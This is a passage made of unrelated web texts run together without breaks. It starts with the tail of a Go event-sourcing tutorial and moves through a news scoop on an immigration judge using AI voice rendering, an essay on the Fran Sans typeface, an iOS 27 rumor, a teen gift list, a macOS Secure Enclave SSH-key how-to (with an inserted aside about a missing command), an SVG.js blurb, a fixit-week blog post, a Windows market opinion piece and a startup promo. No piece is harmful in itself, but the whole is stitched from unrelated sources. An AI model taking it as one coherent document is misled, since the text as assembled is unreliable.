	// pq.CopyIn must be prepared inside a transaction
	tx, err := es.db.Begin()
	if err != nil {
		return err
	}
	defer tx.Rollback()
	stmt, err := tx.Prepare(pq.CopyIn("events",
		"aggregate_id", "aggregate_type", "event_type",
		"event_version", "event_data", "occurred_at"))
	if err != nil {
		return err
	}
	for _, e := range events {
		if _, err := stmt.Exec(e.AggregateID, e.AggregateType,
			e.EventType, e.Version, e.Data, e.OccurredAt); err != nil {
			return err
		}
	}
	// An Exec with no arguments flushes the buffered COPY data
	if _, err := stmt.Exec(); err != nil {
		return err
	}
	if err := stmt.Close(); err != nil {
		return err
	}
	return tx.Commit()
}
// 2. Parallel projection updates
func UpdateProjectionsParallel(events []Event) {
var wg sync.WaitGroup
ch := make(chan Event, 100)
// Start workers
for i := 0; i < 10; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for event := range ch {
updateProjection(event)
}
}()
}
// Send events
for _, e := range events {
ch <- e
}
close(ch)
wg.Wait()
}
// 3. Cache aggregates
var aggregateCache = cache.New(5*time.Minute, 10*time.Minute)
func LoadAccountCached(es *EventStore, accountID string) (*Account, error) {
if cached, found := aggregateCache.Get(accountID); found {
return cached.(*Account), nil
}
account, err := LoadAccount(es, accountID)
if err != nil {
return nil, err
}
aggregateCache.Set(accountID, account, cache.DefaultExpiration)
return account, nil
}
Migration from Traditional System
// Generate events from existing state
func MigrateToEventSourcing(db *sql.DB, es *EventStore) error {
rows, err := db.Query(`
SELECT id, balance, created_at, updated_at
FROM accounts`)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var id string
var balance decimal.Decimal
var createdAt, updatedAt time.Time
if err := rows.Scan(&id, &balance, &createdAt, &updatedAt); err != nil {
return err
}
// Create initial event
events := []Event{
AccountOpened{
AccountID: id,
Timestamp: createdAt,
},
}
// Infer deposit event from balance
if balance.GreaterThan(decimal.Zero) {
events = append(events, MoneyDeposited{
AccountID: id,
Amount: balance,
Timestamp: updatedAt,
})
}
if err := es.SaveEvents(context.Background(), id, "Account", events, 0); err != nil {
return err
}
}
return nil
}
Lessons from Production
| Metric | Before (CRUD) | After (Event Sourcing) |
| --- | --- | --- |
| Write throughput | 1K/sec | 10K/sec |
| Read latency p99 | 5ms | 2ms (projections) |
| Audit completeness | 60% | 100% |
| Debug time | Hours | Minutes (replay) |
| Storage cost | $1K/month | $3-5K/month |
When NOT to Use Event Sourcing
CRUD is sufficient (most apps)
No audit requirements
Simple domain logic
Team unfamiliar with the pattern
Storage cost is critical
The Verdict
Event sourcing isn't free. 3-5x storage cost (events + projections + snapshots). Complex to implement. Mental model shift.
But for financial systems, audit-heavy domains, or complex business logic? It's transformative. Complete history, perfect audit trail, time travel debugging, and horizontal scalability.
Start small:
Event source one aggregate. See the benefits. Then expand. Don't go all-in immediately.
Scoop: Judge Caught Using AI to Read His Court Decisions
WASHINGTON —
Immigration Judge John P. Burns has been using artificial intelligence to generate audio recordings of his courtroom decisions at the New York Broadway Immigration Court, according to internal Executive Office for Immigration Review (EOIR) records obtained by
Migrant Insider.
“That seems highly unusual,” said a senior Justice Department official familiar with EOIR operations, who requested anonymity to discuss internal matters. The official could not confirm whether Burns employs the AI to draft full written decisions or only to read his written rulings aloud using text‑to‑speech software, according to audio files reviewed by
Migrant Insider
.
The concern comes months after Acting EOIR Director Sirce E. Owen circulated Policy Memorandum 25‑40, which acknowledged that the immigration courts have “neither a blanket prohibition on the use of generative AI in its proceedings nor a mandatory disclosure requirement regarding its use.”
The August memo—distributed internally to all immigration judges and court administrators—permitted individual courts to adopt local standing orders on AI use but did not require them to disclose when such technologies are applied in adjudications.
The memo’s omission of any restriction on text‑to‑voice or AI‑generated decision delivery appears to leave it to individual judges’ discretion. Burns appears to be among the first to take advantage of that gap. His courtroom assistants said the use of “voice rendering” software began earlier this year and is now a regular feature of his decisions.
Burns’ use of AI tools comes amid controversy over his record as one of the most restrictive immigration judges in the country. According to
data
compiled by
, Burns approved just 2 percent of asylum claims between fiscal 2019 and 2025—compared with a national average of 57.7 percent. Pathfinder
data
show the same 2 percent benchmark, placing him among the lowest nationwide.
The numbers have fueled criticism from immigration advocates, who say the fusion of extreme denial rates with opaque AI‑assisted adjudication threatens defendants’ faith in the system. “When a person’s freedom depends on a judge’s voice, there needs to be certainty that it’s the judge’s own reasoning being rendered—not a synthesized layer of technology,” said one immigration lawyer who practices before the Broadway court.
Internal EOIR emails released through the memos show that Burns’ path to the bench was unusually political. Initially interviewed in May 2020, he was rated “highly qualified” by two Assistant Chief Immigration Judges for his litigation experience but ranked overall as “Not Recommend.” Senior EOIR leadership later overrode that ranking—reclassifying him as “Highly Recommended” in September 2020, just as Trump‑era DOJ officials accelerated appointments of judges with prosecutorial backgrounds.
At the time of his selection, Burns served as an Assistant Chief Counsel for U.S. Immigration and Customs Enforcement (ICE) in New York, where he represented the government in removal proceedings and appeals. His résumé and military record were cited in his eventual appointment announcement that December, one of 14 judges named by the outgoing administration. Nearly all came from government enforcement roles, according to EOIR data logs.
The Burns memos form part of a broader DOJ paper trail indicating a systematic reshaping of the immigration judiciary. Recent EOIR correspondence references the removal—through firings and resignations—of more than 125 judges since January, replaced with politically aligned appointees.
An
August rule
further loosened hiring standards, allowing the Attorney General to appoint “any licensed attorney” as a temporary immigration judge.
EOIR declined to comment on Burns’ use of text‑to‑voice technology or his designation history. A Justice Department spokesperson responded only that “immigration judges apply the law to the facts of each case.”
But as AI applications quietly enter immigration courtrooms without disclosure requirements or oversight, experts warn of an accelerating shift. “We’re witnessing the automation of adjudication in a system that already struggles with fairness,” said one former EOIR official. “When the human element fades, so does accountability.”
If you’ve read this far, you understand why transparency matters. If you value investigations like this,
subscribe
or
donate
to help Migrant Insider keep pressing for answers.
Fran Sans – font inspired by San Francisco light rail displays
Written by EMILY SNEDDON
Published on 6TH NOVEMBER 2025
Fran Sans
is a display font in every sense of the term. It’s an interpretation of the destination displays found on some of the light rail vehicles that service the city of San Francisco.
SFMTA Photo Department
I say
some
because destination displays aren’t consistently used across the city’s transit system. In fact, SF has an unusually high number of independent public transit agencies. Unlike New York, Chicago or L.A., which each have one, maybe two, San Francisco and the greater Bay Area have over two dozen. Each agency, with its own models of buses and trains, uses different destination displays, creating an eclectic patchwork of typography across the city.
Among them, one display in particular has always stood out to me: the LCD panel displays inside Muni’s Breda Light Rail Vehicles. I remember first noticing them on a Saturday in October on the N-Judah, heading to the Outer Sunset for a shrimp hoagie. This context is important, as anyone who’s spent an October weekend in SF knows this is the optimal vibe to really take in the beauty of the city.
What caught my eye was how the displays look mechanical and yet distinctly personal. Constructed on a 3×5 grid, the characters are made up of geometric modules: squares, quarter-circles, and angled forms. Combined, these modules create imperfect, almost primitive letterforms, revealing a utility and charm that feels distinctly like the San Francisco I’ve come to know.
This balance of utility and charm seems to show up everywhere in San Francisco and its history. The Golden Gate’s “International Orange” started as nothing more than a rust-proof primer, yet is now the city’s defining colour. The Painted Ladies became multicoloured icons after the 1960s Colourist movement covered decades of grey paint. Even the steepness of the streets was once an oversight in city planning but has since been romanticised in films and on postcards. So perhaps it is unsurprising that I would find this same utility and charm in a place as small and functional as a train sign.
To learn more about these displays, I visited the San Francisco Municipal Transportation Agency’s (SFMTA) Electronics Shop at Balboa Park. There, technician Armando Lumbad had set up one of the signs. They each feature one large LCD panel which displays the line name, and twenty-four smaller ones to display the destination. The loose spacing of the letters and fluorescent backlighting gives the sign a raw, analogue quality. Modern LED dot-matrix displays are far more efficient and flexible, but to me, they lack the awkwardness that makes these Breda signs so delightful.
Armando showed me how the signs work. He handed me a printed matrix table listing every line and destination, each paired with a three-digit code. On route, train operators punch the code into a control panel at the back of the display, and the LCD blocks light on specific segments of the grid to build each letter. I picked code 119, and Armando entered it for me. A few seconds later the panels revealed my own stop: the N-Judah at Church & Duboce. There in the workshop, devoid of the context of the trains and the commute, the display looked almost monolithic, or sculptural, and I have since fantasised whether it would be possible to ship one of these home to Australia.
Looking inside the display, I found labels identifying the make and model. The signs were designed and manufactured by Trans-Lite, Inc., a company based in Milford, Connecticut that specialised in transport signage from 1959 until its acquisition by the Nordic firm Teknoware in 2012. After lots of amateur detective work, and with help from an anonymous Reddit user in a Connecticut community group, I was connected with Gary Wallberg, Senior Engineer at Trans-Lite and the person responsible for the design of these very signs back in 1999.
Original drawings of the display, courtesy of William Maley Jnr, former owner and CEO of TRANS-LITE, INC.
Learning that the alphabet came from an engineer really explains its temperament and why I was drawn to it in the first place. The signs were designed for sufficiency: fixed segments, fixed grid, and no extras. Characters were created only as destinations required them, while other characters, like the Q, X, and much of the punctuation, were never programmed into the signs. In reducing everything to its bare essentials, somehow character emerged, and it’s what inspired me to design Fran Sans.
I shared some initial drawings with Dave Foster of
Foster Type
who encouraged me to get the font software Glyphs and turn it into my first working font. From there, I broke down the anatomy of the letters into modules, then used them like Lego to build out a full set: uppercase A–Z, numerals, core punctuation.
Some glyphs remain unsolved in this first version, for example the standard @ symbol refuses to squeeze politely into the 3×5 logic. Lowercase remains a question for the future, and would likely mean reconsidering the grid. But, as with the displays themselves, I am judging Fran Sans as sufficient for now.
Grid comparison. Left is a photo of the display, right is Fran Sans.
Getting up close to these signs, you’ll notice Fran Sans’ gridlines are simplified even from its real‑life muse, but my hope is that its character remains. Specifically: the N and the zero, where the unusually thick diagonals close in on the counters; and the Z and 7, whose diagonals can feel uncomfortably thin. I’ve also noticed the centre of the M can scale strangely and read like an H at small sizes, but in fairness, this type was never designed for the kind of technical detail so many monospaced fonts aim for. Throughout the process I tried to protect these unorthodox moments, because to me, they determined the success of this interpretation.
Fran Sans comes in three styles: Solid, Tile, and Panel, each building in visual complexity. The decision to include variations, particularly the Solid style, was inspired by my time working at
Christopher Doyle & Co.
There, we worked with Bell Shakespeare, Australia’s national theatre company dedicated to the works of William Shakespeare. The equity of the Bell Shakespeare brand lies in its typography, which is a beautiful custom typeface called Hotspur, designed and produced by none other than Dave Foster.
Hotspur by DAVE FOSTER.
Often, brand fonts are chosen or designed to convey a single feeling. Maybe it’s warmth and friendliness, or a sense of tech and innovation. But what I’ve always loved about the Bell typeface is how one weight could serve both Shakespeare’s comedies and tragedies, simply by shifting scale, spacing, or alignment. Hotspur has the gravity to carry the darkness of
Titus Andronicus
and the roundness to convey the humour of
Much Ado About Nothing
. And while Fran Sans Solid is technically no Hotspur, I wanted it to share that same versatility.
Bell Shakespeare by CHRISTOPHER DOYLE & CO.
Further inspiration for Fran Sans came from the
Letterform Archive
, the world’s leading typography archive, based in San Francisco. Librarian and archivist
Kate Long Stellar
thoughtfully curated a research visit filled with modular typography spanning most of the past century. On the table were two pieces that had a significant impact on Fran Sans and are now personal must-sees at the archive. First, Joan Trochut’s
Tipo Veloz
“Fast Type” (1942) was created during the Second World War when resources were scarce.
Tipo Veloz
gave printers the ability to draw with type, rearranging modular pieces to form letters, ornaments and even illustrations.
Second, Zuzana Licko’s process work for
Lo-Res
(1985), an Emigre typeface, opened new ways of thinking about how ideas move between the physical and the digital and then back again. Seeing how
Lo-Res
was documented through iterations and variations gave the typeface a depth and richness that changed my understanding of how fonts are built. At some point I want to explore physical applications for Fran Sans out of respect for its origins, since it is impossible to fully capture the display’s charm on screen.
Letterform Archive research visit, MAY 2025.
Back at the SFMTA, Armando told me the Breda vehicles are being replaced, and with them their destination displays will be swapped for newer LED dot-matrix units that are more efficient and easier to maintain. By the end of 2025 the signs that inspired Fran Sans will disappear from the city, taking with them a small but distinctive part of the city’s voice.
That feels like a real loss. San Francisco is always reinventing itself, yet its charm lies in how much of its history still shows through. My hope is that Fran Sans can inspire a deeper appreciation for the imperfections that give our lives and our cities character. Life is so rich when ease and efficiency are not the measure.
WITH THANKS
Dave Foster, for being my go-to at every stage of this project.
Maria Doreuli, for thoughtfully reviewing Fran Sans.
Maddy Carrucan, for the words that always keep me dreamy.
Jeremy Menzies, for the photography of the Breda vehicles.
Kate Long Stellar, for curating a research visit on modular typography.
Angie Wang, for suggesting it and helping to make it happen.
Vasiliy Tsurkan, for inviting me into the SFMTA workshop.
Armando Lumbad, for maintaining the signs that I love so much.
Rick Laubscher, for putting me in touch with the SFMTA.
William Maley Jr, for opening up the TRANS-LITE, INC. archives.
Gary Wallberg, for designing and engineering the original signs.
Gregory Wallberg, for responding to a very suspicious facebook post.
Reddit u/steve31086, for sleuthing the details of William Maley Jr.
This past year, Apple overhauled its design language across all of its major software platforms with the introduction of Liquid Glass. That dramatic redesign, coupled with a number of jam-packed feature releases over the past couple years, has resulted in many Apple users complaining about the overall quality of Apple software.
According to
today’s Power On newsletter
, Apple might finally be stepping back from new features, and instead focusing on underlying performance improvements. Let’s discuss.
iOS 27 to be a ‘Snow Leopard-style update’
Per
Bloomberg’s Mark Gurman
, Apple is taking a step back from launching any major new software features at WWDC26. This applies to iOS 27 and macOS 27, as well as all of the company’s smaller platforms, like watchOS, tvOS, and visionOS.
For the first time since iOS 12, Apple will be focusing on software quality, rather than flashy new features:
Aiming to improve the software, engineering teams are now combing through Apple’s operating systems, hunting for bloat to cut, bugs to eliminate, and any opportunity to meaningfully boost performance and overall quality. Like Snow Leopard set the groundwork for future overhauls and new types of Macs, iOS 27 will lay the foundation for foldable iPhones and other new hardware.
Apple won’t quite launch ‘zero new features’ as it claimed with OS X Snow Leopard back in 2009, however. According to Gurman, Apple still plans to release a number of new AI features with iOS 27, so the company doesn’t continue to fall behind in the AI race.
Currently, two major AI features are rumored for iOS 27: Apple’s new AI health agent, launching alongside a potential Apple Health+ subscription, and the company’s first AI-powered web search feature.
These new features will shortly follow the launch of AI-infused Siri in iOS 26.4, which is largely anticipated to be powered by a special version of Google Gemini. Said custom version of Google Gemini will avoid sending data to Google’s servers, thanks to a custom-built model for Apple’s private cloud compute.
Wrap up
Outside of the heavy focus on software quality and other AI enhancements, Gurman also outlines three additional things to look out for with iOS 27:
Enhancements for enterprise users
‘Bespoke’ features for users in emerging markets
Design tweaks for Liquid Glass
Overall, iOS 27 is shaping up to be the one update that many Apple enthusiasts have wanted for many years: one that just focuses on polishing up the software.
It remains to be seen whether or not iOS 27 will truly feel as polished as iOS 12 or OS X Snow Leopard, but nonetheless, I’m really happy to see Apple is headed in this direction.
Does a renewed focus on stability in iOS 27 excite you? Let us know in the comments.
The 36 best gift ideas for US teens in 2025 – picked by actual teens
Guardian
www.theguardian.com
2025-11-23 18:15:15
‘Clothes … I just want clothes.’ Teenagers tell us what gifts they actually want this year, from Lululemon to slushie machinesThe 47 best gift ideas for US tweens in 2025 – picked by actual tweensSign up for the Filter US newsletter, your weekly guide to buying fewer, better thingsIf AirPods are “fi...
If
AirPods
are “fire” and other brands are “mid”, does this mean they’re good? If a fab Lululemon jacket gives your kid “drip”, should you consult a doctor? Teenagers are already tough to decipher. Now try to figure out which consoles they own and which shade of makeup they prefer, and it’s no wonder most parents just resort to cash and gift cards.
But don’t give up just yet. We braved eye rolls and shrugs to extract 36
gift ideas
for teens from teens themselves. Pulling these answers out of angsty coming-of-agers wasn’t easy. But they revealed the most sought-after
gifts for gen Alpha
.
A hoodie from Dandy because they are so comfy and they are awesome quality. Mom, don’t complain that it is expensive! I know I already got a mini dachshund for my birthday.
Bella, 14
New hunting boots and fishing lures. Because I love to go outside and my boots wore out, and I need more fishing lures because the fishies ate mine.
Jack, 13
I want a volleyball to practice for trying out for the school team next year. I’m going to high school next year and want to be good enough to try out for the team.
Ethan, 13
“Because … it’s mini donuts! I want a mini donut making machine so that I can make mini donuts and decorate them. It’s a nice, sweet treat, and when my friends come over, we can make them and have decoration competitions! We can also see who can eat the most donuts the fastest.”
Paige, 13
“I wish to have AirPods or Apple Max headphones, so I can listen to music. That way, I can listen to music privately, during class, or drown out the noise of parents and/or siblings.”
Leilana, 16
“For Christmas, I would like to get an iPad Pro with an Apple Pencil and keyboard attachment. I would like to get this because it would make it easier for me to take notes for school and keep track of them.”
Abby, 16
“I want the new Pokémon game. It’s called Pokémon Legends Z-A. I want it because I like Pokémon games and the new battling features are cool.”
Patrick, 13
“I think these are so cute and so I collect them. I build a town in my room and change things based on a season. So, they are a toy and a decoration.”
Amelie, 12
“I would like to get Pokémon cards for my collection so I can trade with my friends.”
Ali, 15
“I’m hoping for Pokémon cards because it’s a fun hobby of mine. Even if I don’t get the perfect cards, I’m still happy to open the packages.”
Mason, 13
“I really, really, really want an electric scooter because all my friends ride one to school and I am the only one in my friend group that doesn’t have one.”
Malik, 12
“I ask for a new Diary of a Wimpy Kid book every year because they’re good books. I like reading them because I like the stories in the books and it has become a tradition. I get a book every year. And this is the latest one.”
Patrick, 13
“On my Christmas list is a gift card to my favorite bookstore. Usually, the book I want is not yet out, and sometimes I just like picking the book out myself rather than someone choosing one for me.”
Justice, 15
There is a shared library
/usr/lib/ssh-keychain.dylib
that traditionally has been used to add smartcard support
to ssh by implementing
PKCS11Provider
interface. However, it recently also started implementing
SecurityKeyProvider
which supports loading keys directly from the secure enclave!
SecurityKeyProvider
is what is normally used to talk to FIDO2 devices (e.g.
libfido2
can be used to talk to your Yubikey). However you can now use it to talk to your Secure Enclave instead!
recording.mov
Key setup
See
man sc_auth
and
man ssh-keychain
for all the options
To create a Secure Enclave backed key that requires biometrics, run the
following command and press TouchID:
% sc_auth create-ctk-identity -l ssh -k p-256-ne -t bio
You can confirm that the key was created with the
list-ctk-identities
command:
arian@Mac ssh-keychain % sc_auth list-ctk-identities
Key Type Public Key Hash Prot Label Common Name Email Address Valid To Valid
p-256-ne A71277F0BC5825A7B3576D014F31282A866EF3BC bio ssh ssh 23.11.26, 17:09 YES
It also supports listing the ssh key fingerprints instead:
% sc_auth list-ctk-identities -t ssh
Key Type Public Key Hash Prot Label Common Name Email Address Valid To Valid
p-256-ne SHA256:vs4ByYo+T9M3V8iiDYONMSvx2k5Fj2ujVBWt1j6yzis bio ssh ssh 23.11.26, 17:09 YES
You can "download" the public / private keypair from the secure enclave using the following command:
% ssh-keygen -w /usr/lib/ssh-keychain.dylib -K -N ""
Enter PIN for authenticator:
You may need to touch your authenticator to authorize key download.
Saved ECDSA-SK key to id_ecdsa_sk_rk
% cat id_ecdsa_sk_rk.pub
sk-ecdsa-sha2-nistp256@openssh.com AAAAInNrLWVjZHNhLXNoYTItbmlzdHAyNTZAb3BlbnNzaC5jb20AAAAIbmlzdHAyNTYAAABBBKiHAiAZhcsZ95n85dkNGs9GnbDt0aNOia2gnuknYV2wKL3y0u+d3QrE9cFkmWXIymHZMglL+uJA+6mShY8SeykAAAAEc3NoOg== ssh:
You can just use the empty string for PIN. For some reason
openssh
always asks for
it even if the authenticator in question does not use a PIN but a biometric.
Note that the "private" key here is just a reference to the FIDO credential. It does
not contain any secret key material. Hence I'm specifying
-N ""
to skip an encryption
passphrase.
Now if you copy this public key to your authorized keys file, it should work!
Instead of downloading the public/private keypair to a file you can also directly
make the keys available to
ssh-agent
. For this you can use the following command:
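The command itself appears to have been dropped from the post; assuming the standard ssh-add flags for FIDO resident keys (-S names the provider library, -K loads resident keys from the authenticator), the invocation would look like:
% ssh-add -S /usr/lib/ssh-keychain.dylib -K
With SSH_SK_PROVIDER exported as described below, a plain ssh-add -K should pick up the same provider.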
SecurityKeyProvider
can be configured in
.ssh/config
but I recommend setting
export SSH_SK_PROVIDER=/usr/lib/ssh-keychain.dylib
in your
.zprofile
instead as
that environment variable gets picked up by
ssh
,
ssh-add
and
ssh-keygen
.
SVG.js has no dependencies and aims to be as small as possible while providing close to complete coverage of the SVG spec. If you're not convinced yet, here are a few highlights.
It's speedy.
SVG.js is fast. Obviously not as fast as vanilla js, but many times faster than the competition:
Benchmark index: rects (generate 10,000 rects), fill (generate 10,000 rects with fill color), gradient (generate 10,000 rects with gradient fill). Less is better. Tested on an Intel Core i7-4702MQ @ 2.2GHz.
Easy readable, uncluttered syntax.
Creating and manipulating SVG using JavaScript alone is pretty verbose. For example, just creating a simple pink square takes around ten lines of plain DOM code.
SVG.js provides a syntax that is concise and easy to read. Doing the same in SVG.js:
// SVG.js
var draw = SVG().addTo('#drawing')
, rect = draw.rect(100, 100).fill('#f06')
That's just
two
lines of code instead of
ten
! And a whole lot less repetition.
Go crazy with animations
There is more...
animations
on size, position, transformations, color, ...
It’s Friday at 4pm. I’ve just closed my 12th bug of the week. My brain is completely fried. And I’m staring at the bug leaderboard, genuinely sad that Monday means going back to regular work. Which is weird because I
love
regular work. But fixit weeks have a special place in my heart.
What’s a fixit, you ask?
Once a quarter, my org with ~45 software engineers stops all regular work for a week. That means no roadmap work, no design work, no meetings or standups.
Instead, we fix the small things that have been annoying us and our users:
an error message that’s been unclear for two years
a weird glitch when the user scrolls and zooms at the same time
a test which runs slower than it should, slowing down CI for everyone
The rules are simple: 1) no bug should take over 2 days and 2) all work should focus on either small end-user bugs/features or developer productivity.
We also have a “points system” for bugs and a leaderboard showing how many points people have. And there’s a promise of t-shirts for various achievements: first bug fix, most points, most annoying bug, etc. It’s a simple structure, but it works surprisingly well.
What we achieved
Some stats from this fixit:
189 bugs fixed
40 people participated
4 was the median number of bugs closed per person
12 was the maximum number of bugs closed by one person
Bug Burndown Chart for the Q4'25 Fixit
Here are some of the highlights (sadly many people in my org work in internal-facing things so I cannot share their work!):
I closed a
feature request
from 2021! It’s a classic fixit issue: a small improvement that never bubbled to the priority list. It took me
one day
to implement. One day for something that sat there for
four years
. And it’s going to provide a small but significant boost to every user’s experience of Perfetto.
My colleague made this
small change
to improve team productivity. Just ~25 lines of code in a GitHub Action to avoid every UI developer taking two extra clicks to open the CI’s build. The response from the team speaks for itself:
Such a simple change but the team loved it!
I also fixed
this
issue to provide a new “amalgamated” version of our SDK, allowing it to be easily integrated into projects. It’s one of those things that might be the difference between someone deciding to use us or not, but building it took just one hour of work (with liberal use of AI!).
The benefits of fixits
For the product: craftsmanship and care
I care deeply about any product I work on. That means asking big questions like “what should we build?” and “how do we make this fast?” But it also means asking smaller questions: “is this error message actually helpful?” or “would I be frustrated using this?”
A hallmark of any good product is attention to detail: a sense that someone has thought things through, and the pieces fit together to make a cohesive whole. And the opposite is true: a product with rough edges might be tolerated if there are no alternatives, but there will always be a sense of frustration and “I wish I could use something else”.
Fixits are a great chance to work on exactly those details that separate good products from great ones. The small things your average user might not consciously notice, but absolutely will notice if they’re wrong.
For the individual: doing, not thinking
I sometimes miss the feeling I had earlier in my career when I got to just fix things. See something broken, fix it, ship it the same day.
The more senior you get in a big company, the less you do that. Most of your time becomes thinking about what to build next, planning quarters ahead, navigating tradeoffs and getting alignment.
Fixits give me that early-career feeling back. You see the bug, you fix it, you ship it, you close it, you move on. There’s something deeply satisfying about work where the question isn’t “what should we do?” but rather “can I make this better?” And you get to answer that question multiple times in a week.
For the team: morale and spirit
People sharing live updates in the Fixit chatroom
Having 40 people across two time zones all fixing bugs together adds a whole other dimension.
The vibe of the office is different: normally we’re all heads-down on different projects, but during fixit the team spirit comes out strong. People share their bug fixes in chat rooms, post before-and-after screenshots and gather around monitors to demo a new feature or complain about a particularly nasty bug they’re wrestling with.
The daily update from Friday
The leaderboard amplifies this energy. There’s a friendly sense of competition as people try and balance quick wins with meatier bugs they can share stories about.
There’s also a short update every morning about how the previous day went:
total bugs fixed
how many people have fixed at least one bug
how many different products we’ve fixed things in
who’s currently at the top of the leaderboard
All of this creates real momentum, and people feel magnetically pulled into the effort.
How to run a fixit
I’ve participated in 6 fixits over the years and I’ve learned a lot about what makes them successful. Here are a few things that matter more than you’d think.
Preparation is key
Most of what makes a fixit work happens before the week even starts.
All year round, we encourage everyone to tag bugs as “good fixit candidates” as they encounter them. Then the week before fixit, each subteam goes through these bugs and sizes them:
small (less than half a day)
medium (less than a day)
large (less than 2 days).
They assign points accordingly: 1, 2, or 4.
We also create a shortlist of high-priority bugs we really want fixed. People start there and move to the full list once those are done. This pre-work is critical: it prevents wasting day one with people aimlessly searching for bugs to fix.
The 2-day hard limit
In one of our early fixits, someone picked up what looked like a straightforward bug. It should have been a few hours, maybe half a day. But it turned into a rabbit hole. Dependencies on other systems, unexpected edge cases, code that hadn’t been touched in years.
They spent the entire fixit week on it. And then the entire week after fixit trying to finish it. What started as a bug fix turned into a mini project.
The work was valuable! But they missed the whole point of a fixit. No closing bugs throughout the week. No momentum. No dopamine hits from shipping fixes. Just one long slog.
That’s why we have the 2-day hard limit now. If something is ballooning, cut your losses. File a proper bug, move it to the backlog, pick something else. The limit isn’t about the work being worthless - it’s about keeping fixit feeling like fixit.
Number of people matters
We didn’t always do fixits with 40 people. Early on, this wasn’t an org-wide effort, just my subteam of 7 people. It worked okay: bugs got fixed and there was a sense of pride in making the product better. But it felt a bit hollow: in the bigger picture of our org, it didn’t feel like anyone else noticed or cared.
At ~40 people, it feels like a critical mass that changes things significantly. The magic number is probably somewhere between 7 and 40. And it probably varies based on the team. But whatever the number is, the collective energy matters. If you’re trying this with 5 people, it might still be worth doing, but it probably won’t feel the same.
Gamification
The points and leaderboard are more than a gimmick, but they have to be handled carefully.
What works for us:
Points are coarse, not precise
: We deliberately use 1/2/4 points instead of trying to measure exact effort; the goal is “roughly right and fun”, not accurate performance evaluation.
Celebrate breadth, not just volume.
We give t-shirts for things like “first bug fix”, “most annoying bug fixed”, not just “most points”. That keeps newer or less experienced engineers engaged.
Visibility over prizes.
A shout-out in the daily update or an internal post often matters more than the actual t-shirt.
No attachment to perf reviews
. This is important: fixit scores do
not
feed into performance reviews. The moment they do, people will start gaming it and the good vibe will die.
We’ve had very little “gaming” in practice. Social norms do a good job of keeping people honest and 40 is still small enough that there’s a sense of “loyalty to the cause” from folks.
The AI factor
The big challenge with fixits is context switching. Constantly changing what you’re working on means constantly figuring out new parts of the codebase, thinking about new problems.
AI tools have mitigated this in a big way. The code they write is less important than their ability to quickly search through relevant files and summarize what needs to change. They might be right or wrong, but having that starting point really reduces the cognitive load. And sometimes (rarely) they one-shot a fix.
This
docs change
was a perfect example of the above: an update to our docs which catches out new contributors and AI was able to one-shot the fix.
On the other hand, in my
record page change
it was more useful for giving me prototypes of what the code should look like and I had to put in significant effort to correct the bad UX it generated and its tendency to “over-generate” code. Even so, it got me to the starting line much faster.
Criticisms of fixits (and why I still like them anyway)
I’ve definitely come across people who question whether fixits are actually a good idea. Some of the criticisms are fair but overall I still think it’s worth it.
“Isn’t this just admitting you ignore bugs the rest of the time?”
To some extent, yes, this is an admission of the fact that “papercut” bugs are underweighted in importance, both by managers and engineers. It’s all too easy to tunnel on making sure a big project is successful and easier to ignore the small annoyances for users and the team.
Fixits are a way of counterbalancing that somewhat and saying “actually those bugs matter too”. That’s not to say we don’t fix important bugs during regular work; we absolutely do. But fixits recognize that there should be a place for handling the “this is slightly annoying but never quite urgent enough” class of problems.
The whole reason we started fixits in the first place is that we observed these bugs never get actioned. Given this, I think carving out some explicit time for it is a good thing.
“Isn’t it a waste to pause roadmap work for a whole week?”
It’s definitely a tradeoff. 40 engineer-weeks is a
lot
of manpower and there’s an argument to be made it should be used for actually solving roadmap problems.
But I think this underweights how much product polish matters to users. We’ve consistently found that the product feels noticeably better afterward (including positive comments from users about things they notice!) and there’s a sense of
pride
in having a well-functioning product.
Also, many of the team productivity fixes compound (faster tests, clearer errors, smoother workflows) so the benefits carry forward well beyond the week itself.
This only works at big companies!
I agree that a full week might be too much for tiny teams or startups. But you can still borrow the idea in smaller chunks: a “fixit Friday” once a month, or a 2-day mini-fixit each quarter. The core idea is the same: protected, collective time to fix the stuff people complain about but no one schedules time to address.
Fixits are good for the soul
The official justification for fixits is that they improve product quality and
developer productivity. And of course they do this.
But the unofficial reason I love them is simpler: it just feels good to fix things. It takes me back to a simpler time, and putting thought and attention into building great products is a big part of my ethos for how software engineering should be done. I wouldn’t want to work like that all the time. But I also wouldn’t want to work somewhere that never makes time for it.
If you enjoyed this post, you can
subscribe
to my weekly roundup of recent posts, or follow via
RSS
.
I’m not saying this will definitely happen, but I think we could be on the cusp of a significant shift in Windows market share for consumer computers. It is not going to drop to 2% in a year or anything, but I feel like a few pieces are coming together that could move the needle in a way we have not seen in several decades. There are three things on my mind.
Number one is that Microsoft just does not feel like a consumer tech company at all anymore. Yes, they have always been much more corporate than the likes of Apple or Google, but it really shows in the last few years as they seem to only have energy for AI and web services. If you are not a customer who is a major business or a developer creating the next AI-powered app, Microsoft does not seem to care about you.
I just do not see excitement there. The only thing of note they have added to Windows in the last five years is Copilot, and I have yet to meet a normal human being who enjoys using it. And all the Windows 11 changes seem to have just gone over about as well as a lead balloon. I just do not think they care at all about Windows with consumers.
The second thing is the affordable MacBook rumored to be coming out in 2026. This will be a meaningfully cheaper MacBook that people can purchase at price points that many Windows computers have been hovering around for many years. Considering Apple’s focus on consumers first and a price point that can get more people in the door, it seems like that could move the needle.
The third thing is gamers. Gamers use Windows largely because they have to, not because they are passionate about it. Maybe they were passionate about it in the 90s, but any passion has gone away. Now it is just the operating system they use to launch Steam. In early 2026, Valve is going to release the Steam Machine after a few years of success with the Steam Deck. We will see how they do there, but what they are doing is releasing a machine that runs Windows games on Linux. And it runs them really well. The Steam Deck has proven that over the last few years. If someone can package up a version of Linux that is optimized for gamers, then I think there is a meaningful number of PC gamers who would happily run that on their computer instead.
I do not know if this is going to happen. It is always easy to be cynical and suggest everything will stay the same, and I understand that markets of this size take a long time to change. However, it just feels like there are some things happening right now that are going to move the needle, and I am excited to see what happens.
At HumanLayer, we’re on a mission to change how teams build software with AI. If we had a motto it would be “no vibes allowed” - we believe that AI agent-enabled coding is a
deeply technical engineering craft
, and we’re building CodeLayer to unlock it at scale. A Stanford study from June 2025 said AI can’t solve hard problems or work well in complex or legacy codebases, and we’re proving them wrong with advanced techniques inspired by Context Engineering (a term originally coined by our CEO Dex in April 2025). Learn more about our mission and learnings at
https://hlyr.dev/ace-fca
